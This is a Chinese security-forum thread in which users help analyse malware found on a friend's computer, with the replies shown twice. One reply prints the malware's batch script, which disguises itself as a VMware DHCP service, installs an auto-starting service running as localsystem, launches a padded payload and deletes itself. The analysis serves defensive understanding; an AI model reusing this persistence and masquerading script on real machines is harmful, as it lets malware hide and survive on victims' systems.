一朋友的电脑中了这样的东西，有时间的朋友帮忙分析一下？-付费问答-看雪-安全社区|安全招聘|kanxue.com

最新回复 (8)
东方容克雪币： 90 活跃值： (82) 能力值： ( LV3，RANK：20 ) 在线值：发帖 13 回帖 144 粉丝 1 关注私信	东方容克 2 楼究竟是什么东西？怎么中的，中之后有什么状况？ 2011-8-5 22:04 0
白玉箫雪币： 351 活跃值： (22) 能力值： ( LV2，RANK：10 ) 在线值：发帖 4 回帖 197 粉丝 0 关注私信	白玉箫 3 楼主程序： ---------------------------------------------------------------------------------------- 1.创建目录"C:\Program Files\VMware7\" 2.获取windows目录拷贝rundll32.exe到"C:\Documents and Settings\laass.exe" 3.通过LoadResource的方式写入 "C:\Documents and Settings\Ksoft.log"文件大小为123M 其中垃圾数据122M还多。。。传说中的增肥术其实主要动作都在Ksoft.log里 ms是注入的洗澡去鸟 4.创建 "C:\Program Files\VMware7\Cests.bat" 内容: @echo off echo off sc \\127.0.0.1 create "Win" binpath= "cmd.exe /c C:\PROGRA~1\VMware7\Ksoft.bat" start= auto type= interact type= own displayname= "VMware7" sc \\127.0.0.1 config "Win" binpath= "cmd.exe /c C:\PROGRA~1\VMware7\Ksoft.bat" start= auto type= interact type= own obj= localsystem password= "" sc \\127.0.0.1 description "Win" "VMware DHCP Service." rem sc \\127.0.0.1 start "Win" @start /d C:\Docume~1 laass.exe Ksoft.log FUCK del %0 5.创建“c:\AA.exe” 大小和Ksoft.log差不多当然垃圾数据也差不多然后执行c:\AA.exe 6.调用cmd执行"cmd /c ping 127.0.0.1 - n & del 自身"然后退出进程 2011-8-5 23:05 0
qiaoyun 雪币： 15 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 11 回帖 33 粉丝 0 关注私信	qiaoyun 4 楼白玉箫兄厉害啊，不过没还是没特别明白，那怎么才能不让它运行呢？还有你是怎么分析出来的啊？？？呵呵。。。学习一下，谢了！ 2011-8-7 18:19 0
kklllw 雪币： 3 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 1 回帖 11 粉丝 0 关注私信	kklllw 5 楼我也想知道怎么分析出来的。 2011-8-7 18:37 0
辰凌风雪币： 152 活跃值： (15) 能力值： ( LV2，RANK：10 ) 在线值：发帖 0 回帖 21 粉丝 0 关注私信	辰凌风 6 楼我记得以前有一个工具是可以记录一个程序，对注册表进行的操作，对硬盘进行的操作的。是不是那个记录的呢？？ Google了下，貌似说是：Regmon Filemon 。。有时间再看看～ 2011-8-7 23:22 0
Asvel 雪币： 4 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 0 回帖 3 粉丝 0 关注私信	Asvel 7 楼这两个软件已经被process monitor代替了 2011-8-8 02:10 0
amggking 雪币： 17 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 2 回帖 24 粉丝 0 关注私信	amggking 8 楼去虚拟机里开程序看看 2011-8-12 21:38 0
linhanshi 雪币： 97697 活跃值： (200854) 能力值： (RANK：10 ) 在线值：发帖 9249 回帖 27950 粉丝 454 关注私信	linhanshi 9 楼灌水警告一次 Welcome forum.forum is a home. Please respect the copyright from the Internet. Пожалуйста, уважайте авторское право в Интернете. 來源于互聯網, 請尊重版權. 所發資源全部來自對互聯網公共資源的收集和整理,僅供學習之用,請于下載后24小時自行刪除! Issued by all the resources of public resources from the Internet to collect and collate, study purposes only, please delete themselves 24 hours after downloading! Выпущено всеми ресурсами государственных ресурсов из Интернет а на сбор и обобщение, изучение целей, пожалуйста, удалите себя 24 часов после скачивания! You can Google. Программное обеспечение выпуска и Windows Crack Обучение Нам-Dabei Guanyin Бодхисаттва Нам без митабха 2011-8-13 00:02 0
	游客登录 \| 注册方可回帖回帖表情雪币赚取及消费高级回复

最新回复 (8)
东方容克雪币： 90 活跃值： (82) 能力值： ( LV3，RANK：20 ) 在线值：发帖 13 回帖 144 粉丝 1 关注私信	东方容克 2 楼究竟是什么东西？怎么中的，中之后有什么状况？ 2011-8-5 22:04 0
白玉箫雪币： 351 活跃值： (22) 能力值： ( LV2，RANK：10 ) 在线值：发帖 4 回帖 197 粉丝 0 关注私信	白玉箫 3 楼主程序： ---------------------------------------------------------------------------------------- 1.创建目录"C:\Program Files\VMware7\" 2.获取windows目录拷贝rundll32.exe到"C:\Documents and Settings\laass.exe" 3.通过LoadResource的方式写入 "C:\Documents and Settings\Ksoft.log"文件大小为123M 其中垃圾数据122M还多。。。传说中的增肥术其实主要动作都在Ksoft.log里 ms是注入的洗澡去鸟 4.创建 "C:\Program Files\VMware7\Cests.bat" 内容: @echo off echo off sc \\127.0.0.1 create "Win" binpath= "cmd.exe /c C:\PROGRA~1\VMware7\Ksoft.bat" start= auto type= interact type= own displayname= "VMware7" sc \\127.0.0.1 config "Win" binpath= "cmd.exe /c C:\PROGRA~1\VMware7\Ksoft.bat" start= auto type= interact type= own obj= localsystem password= "" sc \\127.0.0.1 description "Win" "VMware DHCP Service." rem sc \\127.0.0.1 start "Win" @start /d C:\Docume~1 laass.exe Ksoft.log FUCK del %0 5.创建“c:\AA.exe” 大小和Ksoft.log差不多当然垃圾数据也差不多然后执行c:\AA.exe 6.调用cmd执行"cmd /c ping 127.0.0.1 - n & del 自身"然后退出进程 2011-8-5 23:05 0
qiaoyun 雪币： 15 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 11 回帖 33 粉丝 0 关注私信	qiaoyun 4 楼白玉箫兄厉害啊，不过没还是没特别明白，那怎么才能不让它运行呢？还有你是怎么分析出来的啊？？？呵呵。。。学习一下，谢了！ 2011-8-7 18:19 0
kklllw 雪币： 3 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 1 回帖 11 粉丝 0 关注私信	kklllw 5 楼我也想知道怎么分析出来的。 2011-8-7 18:37 0
辰凌风雪币： 152 活跃值： (15) 能力值： ( LV2，RANK：10 ) 在线值：发帖 0 回帖 21 粉丝 0 关注私信	辰凌风 6 楼我记得以前有一个工具是可以记录一个程序，对注册表进行的操作，对硬盘进行的操作的。是不是那个记录的呢？？ Google了下，貌似说是：Regmon Filemon 。。有时间再看看～ 2011-8-7 23:22 0
Asvel 雪币： 4 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 0 回帖 3 粉丝 0 关注私信	Asvel 7 楼这两个软件已经被process monitor代替了 2011-8-8 02:10 0
amggking 雪币： 17 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 2 回帖 24 粉丝 0 关注私信	amggking 8 楼去虚拟机里开程序看看 2011-8-12 21:38 0
linhanshi 雪币： 97697 活跃值： (200854) 能力值： (RANK：10 ) 在线值：发帖 9249 回帖 27950 粉丝 454 关注私信	linhanshi 9 楼灌水警告一次 Welcome forum.forum is a home. Please respect the copyright from the Internet. Пожалуйста, уважайте авторское право в Интернете. 來源于互聯網, 請尊重版權. 所發資源全部來自對互聯網公共資源的收集和整理,僅供學習之用,請于下載后24小時自行刪除! Issued by all the resources of public resources from the Internet to collect and collate, study purposes only, please delete themselves 24 hours after downloading! Выпущено всеми ресурсами государственных ресурсов из Интернет а на сбор и обобщение, изучение целей, пожалуйста, удалите себя 24 часов после скачивания! You can Google. Программное обеспечение выпуска и Windows Crack Обучение Нам-Dabei Guanyin Бодхисаттва Нам без митабха 2011-8-13 00:02 0
	游客登录 \| 注册方可回帖回帖表情雪币赚取及消费高级回复

[旧帖] 一朋友的电脑中了这样的东西，有时间的朋友帮忙分析一下？ 0.00雪花